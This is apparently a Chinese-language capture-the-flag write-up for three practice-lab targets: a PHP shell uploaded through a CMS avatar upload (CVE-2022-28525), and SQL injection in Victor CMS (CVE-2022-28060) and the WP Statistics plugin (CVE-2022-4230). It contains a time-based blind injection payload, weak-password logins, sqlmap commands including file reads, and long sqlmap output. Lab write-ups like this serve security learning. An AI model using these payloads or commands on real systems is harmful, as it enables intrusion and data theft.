CVE-2022-28525

靶标介绍：ED01-CMS v20180505 存在任意文件上传漏洞

看到一个登录框，习惯性用admin admin尝试弱口令登录，发现登录成功，直接来到管理员界面

在Posts中的add post中找到文件上传点

但是即使上传正常的jpg图片都会出现上传错误， 显示Database error: Field \'post_views_count\' doesn\'t have a default value 估计是题目环境本身有问题，寻找其它的漏洞点 然后再Users中的Add User中找到文件上传的点，在这里可以创建用户，同时可以上传新用户的头像 直接上传一个php文件试试水，结果发现可以直接上传成功 在View All Users中找到刚刚创建的用户，这里我创建了名为1234的用户，右键image中的头像，复制头像连接后访问，直接得到shell

直接cat /flag获得flag

CVE-2022-28060

靶标介绍：Victor CMS v1.0 /includes/login.php 存在sql注入

SQL注入直接用sqlmap梭 先登录一次通过抓包找到用户名和密码的参数名

导出为文本文件后 sqlmap -r 文件名 --batch指令直接跑就跑出来了，不过因为是布尔盲注会有点慢 再使用sqlmap -r 文件名 --batch --file-read "/flag"跑出flag文件内容 (春秋云境的flag一般都是在/flag中, 这里也猜测我们使用的数据库用户满足load_file函数的使用前提, 所以直接用--file-read "文件路径"跑)

CVE-2022-4230

靶标介绍：WP Statistics WordPress 插件13.2.9之前的版本不会转义参数，这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下，具有管理选项功能 (admin+) 的用户可以使用受影响的功能，但是该插件有一个设置允许低权限用户也可以访问它。

访问目标发现初始页面为空，通过搜索发现wordpress管理员界面的对应路由为/wp-admin/admin.php 访问后发现登录界面，直接弱口令爆破

爆破出账号test，密码test 搜索cve漏洞 找到wpscan上的漏洞讲解 WP 统计 < 13.2.9 – 经过身份验证的 SQLi |CVE 漏洞 2022-4230 |插件漏洞按照上面的说明进行复现 先访问/wp-admin/admin-ajax.php?action=rest-nonce得到一串代码 这里我得到的是452a20ab61 然后访问/wp-json/wp-statistics/v2/metabox?_wpnonce=452a20ab61&name=words&search_engine=aaa' AND (SELECT 5671 FROM (SELECT(SLEEP(5)))Mdgs)-- HsBR将请求包保存(这里把search_engine中的payload给删掉, 否则sqlmap注入不出来)

GET /wp-json/wp-statistics/v2/metabox?_wpnonce=452a20ab61&name=words&search_engine=aaaHTTP/1.1
Host: eci-2zej9c5h4qkz1lhh3rwl.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_0c4cf6eb6832e318abc67fee8352d62f=test%7C1743678978%7CLECKpEdgZNaM537AbSD1WI0D219sFpe00OWwpMgjhsR%7Cfc855e26fae16001173dffde835bfc0a0c7bc8f0ee351c24cf903ab5dd0ec61e; wp_lang=zh_CN; wp-settings-time-1=1743506186
Upgrade-Insecure-Requests: 1
Priority: u=0, i

保存为333.txt 然后跑sqlmap

sqlmap -r 333.txt --technique=T --dbms="MySQL" --dbs --exclude-sysdbs

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:44:56 /2025-04-01/

[19:44:56] [INFO] parsing HTTP request from '333.txt'
[19:44:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search_engine (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: _wpnonce=452a20ab61&name=words&search_engine=aaa' AND (SELECT 6493 FROM (SELECT(SLEEP(5)))KFHy) AND 'Yiyf'='Yiyf
---
[19:44:56] [INFO] testing MySQL
[19:44:56] [INFO] confirming MySQL
[19:44:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.33
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[19:44:56] [INFO] fetching database names
[19:44:56] [INFO] fetching number of databases
[19:44:56] [INFO] resumed: 4
[19:44:56] [INFO] resuming partial value: informatio
[19:44:56] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]y
[20:12:44] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[20:12:44] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[20:12:54] [INFO] adjusting time delay to 1 second due to good response times
n_schemda
[20:13:23] [INFO] retrieved: mysql
[20:13:42] [INFO] retrieved: performance_schema
[20:14:50] [INFO] retrieved: wordpress
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] wordpress

[20:15:26] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/eci-2zej9c5h4qkz1lhh3rwl.cloudeci1.ichunqiu.com'                                                       

[*] ending @ 20:15:26 /2025-04-01/

找到敏感库wordpress 指定库名列出表名

sqlmap -r 333.txt --technique=T --dbms="MySQL" --exclude-sysdbs -D wordpress -T "flag" --tables

       ___
       __H__                                                                                        
 ___ ___[)]_____ ___ ___  {1.9.2#stable}                                                            
|_ -| . [,]     | .'| . |                                                                           
|___|_  [']_|_|_|__,|  _|                                                                           
      |_|V...       |_|   https://sqlmap.org                                                        

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:38:38 /2025-04-01/

[20:38:38] [INFO] parsing HTTP request from '333.txt'
[20:38:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search_engine (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: _wpnonce=452a20ab61&name=words&search_engine=aaa' AND (SELECT 6493 FROM (SELECT(SLEEP(5)))KFHy) AND 'Yiyf'='Yiyf
---
[20:38:39] [INFO] testing MySQL
[20:38:39] [INFO] confirming MySQL
[20:38:39] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.33
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[20:38:39] [INFO] fetching tables for database: 'wordpress'
[20:38:39] [INFO] fetching number of tables for database 'wordpress'
[20:38:39] [INFO] resumed: 34
[20:38:39] [INFO] resumed: wp_statistics_pages
[20:38:39] [INFO] resumed: wp_statistics_visitor
[20:38:39] [INFO] resumed: wp_terms
[20:38:39] [INFO] resumed: wp_learnpress_section_items
[20:38:39] [INFO] resumed: wp_statistics_useronline
[20:38:39] [INFO] resumed: wp_posts
[20:38:39] [INFO] resumed: wp_learnpress_question_answermeta
[20:38:39] [INFO] resumed: wp_term_taxonomy
[20:38:39] [INFO] resumed: wp_usermeta
[20:38:39] [INFO] resumed: wp_termmeta
[20:38:39] [INFO] resumed: wp_statistics_historical
[20:38:39] [INFO] resumed: wp_commentmeta
[20:38:39] [INFO] resumed: wp_learnpress_sections
[20:38:39] [INFO] resumed: wp_thim_cache
[20:38:39] [INFO] resumed: wp_options
[20:38:39] [INFO] resumed: wp_users
[20:38:39] [INFO] resumed: wp_learnpress_user_item_results
[20:38:39] [INFO] resumed: wp_learnpress_sessions
[20:38:39] [INFO] resumed: wp_learnpress_order_items
[20:38:39] [INFO] resuming partial value: wp_postme
[20:38:39] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[20:38:45] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[20:39:05] [INFO] adjusting time delay to 1 second due to good response times
ta
[20:39:11] [INFO] retrieved: flag
[20:39:28] [INFO] retrieved: wp^C

[*] ending @ 20:39:41 /2025-04-01/

然后再运行 sqlmap -r 333.txt --technique=T --dbms="MySQL" --exclude-sysdbs -D wordpress -T flag --columns 找到列名flag 和 sqlmap -r 333.txt --technique=T --dbms="MySQL" --exclude-sysdbs -D wordpress -T flag -C flag --dump 找到flag的具体内容

顺便吐槽一下, mysql这个数据库中有34个表, sqlmap时间盲注要完整跑完估计要一小时, 我等到最后直接测试flag表去了